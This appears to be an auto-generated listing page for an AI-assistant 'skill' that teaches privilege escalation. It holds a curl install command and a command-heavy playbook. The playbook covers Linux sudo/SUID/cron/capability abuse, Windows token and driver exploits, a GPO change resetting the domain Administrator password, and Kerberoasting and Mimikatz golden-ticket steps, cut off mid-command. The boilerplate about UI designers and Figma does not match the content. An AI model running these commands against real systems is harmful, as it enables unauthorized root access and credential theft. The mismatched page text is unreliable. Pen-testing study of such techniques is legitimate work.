Privilege Escalation Methods
Privilege Escalation Methods is an code AI skill with a core value of This skill should be used when the user asks to \"escalate privileges\", \"get root access\", \"become administrator\", \"privesc techniques\", \"abuse sudo\", \"exploit SUID binaries\", \"K. It
helps developers solve real-world problems in the code domain, boosting
efficiency, automating repetitive tasks, and optimizing workflows.
This skill should be used when the user asks to \"escalate privileges\", \"get root access\", \"become administrator\", \"privesc techniques\", \"abuse sudo\", \"exploit SUID binaries\", \"K...
Quick Facts
mkdir -p ./skills/privilege-escalation-methods && curl -sfL https://raw.githubusercontent.com/sickn33/antigravity-awesome-skills/main/skills/privilege-escalation-methods/SKILL.md -o ./skills/privilege-escalation-methods/SKILL.md Run in terminal / PowerShell. Requires curl (Unix) or PowerShell 5+ (Windows).
Skill Content
# Privilege Escalation Methods
Purpose
Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.
Inputs/Prerequisites
- Initial low-privilege shell access on target system
- Kali Linux or penetration testing distribution
- Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus
- Understanding of Windows/Linux privilege models
- For AD attacks: Domain user credentials and network access to DC
Outputs/Deliverables
- Root or Administrator shell access
- Extracted credentials and hashes
- Persistent access mechanisms
- Domain compromise (for AD environments)
---
Core Techniques
Linux Privilege Escalation
#### 1. Abusing Sudo Binaries
Exploit misconfigured sudo permissions using GTFOBins techniques:
# Check sudo permissions
sudo -l
# Exploit common binaries
sudo vim -c ':!/bin/bash'
sudo find /etc/passwd -exec /bin/bash \;
sudo awk 'BEGIN {system("/bin/bash")}'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
sudo less /etc/hosts # then type: !bash
sudo man man # then type: !bash
sudo env /bin/bash#### 2. Abusing Scheduled Tasks (Cron)
# Find writable cron scripts
ls -la /etc/cron*
cat /etc/crontab
# Inject payload into writable script
echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
chmod +x /home/user/systemupdate.sh
# Wait for execution, then:
/bin/bash -p#### 3. Abusing Capabilities
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Python with cap_setuid
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
# Tar with cap_dac_read_search (read any file)
/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
/usr/bin/tar -xvf key.tar#### 4. NFS Root Squashing
# Check for NFS shares
showmount -e <victim_ip>
# Mount and exploit no_root_squash
mkdir /tmp/mount
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
cd /tmp/mount
cp /bin/bash .
chmod +s bash#### 5. MySQL Running as Root
# If MySQL runs as root
mysql -u root -p
\! chmod +s /bin/bash
exit
/bin/bash -p---
Windows Privilege Escalation
#### 1. Token Impersonation
# Using SweetPotato (SeImpersonatePrivilege)
execute-assembly sweetpotato.exe -p beacon.exe
# Using SharpImpersonation
SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser#### 2. Service Abuse
# Using PowerUp
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'#### 3. Abusing SeBackupPrivilege
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit#### 4. Abusing SeLoadDriverPrivilege
# Load vulnerable Capcom driver
.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
.\ExploitCapcom.exe#### 5. Abusing GPO
.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" `
--Author DOMAIN\<USER> --Command "cmd.exe" `
--Arguments "/c net user Administrator Password!@# /domain" `
--GPOName "ADDITIONAL DC CONFIGURATION"---
Active Directory Attacks
#### 1. Kerberoasting
# Using Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request
# Using CrackMapExec
crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt#### 2. AS-REP Roasting
.\Rubeus.exe asreproast#### 3. Golden Ticket
# DCSync to get krbtgt hash
mimikatz# lsadump::dcsync /user:krbtgt
# Create golden ticket
mimikatz# kerberos::golden /user:Administrator /domain:dom🎯 Best For
- UI designers
- Product designers
- Claude users
- Software engineers
- Development teams
💡 Use Cases
- Generating component mockups
- Creating design system tokens
- Code quality improvement
- Best practice enforcement
📖 How to Use This Skill
- 1
Install the Skill
Copy the install command from the Terminal tab and run it. The SKILL.md file downloads to your local skills directory.
- 2
Load into Your AI Assistant
Open Claude and reference the skill. Paste the SKILL.md content or use the system prompt tab.
- 3
Apply Privilege Escalation Methods to Your Work
Open your project in the AI assistant and ask it to apply the skill. Start with a small module to verify the output quality.
- 4
Review and Refine
Review AI suggestions before committing. Run tests, check for regressions, and iterate on the skill output.
❓ Frequently Asked Questions
Does this work with Figma?
Some design skills integrate with Figma plugins. Check the Works With section for supported tools.
Is Privilege Escalation Methods compatible with Cursor and VS Code?
Yes — this skill works with any AI coding assistant including Cursor, VS Code with Copilot, and JetBrains IDEs.
Do I need specific dependencies for Privilege Escalation Methods?
Check the install command and Works With section. Most code skills only require the AI assistant and your codebase.
How do I install Privilege Escalation Methods?
Copy the install command from the Terminal tab and run it. The skill downloads to ./skills/privilege-escalation-methods/SKILL.md, ready to use.
Can I customize this skill for my team?
Absolutely. Edit the SKILL.md file to add team-specific instructions, examples, or workflows.
⚠️ Common Mistakes to Avoid
Skipping usability testing
AI-generated designs should be validated with real users before development.
Skipping validation
Always test AI-generated code changes, even for simple refactors.
Missing dependency updates
Check if the skill requires updated dependencies or new packages.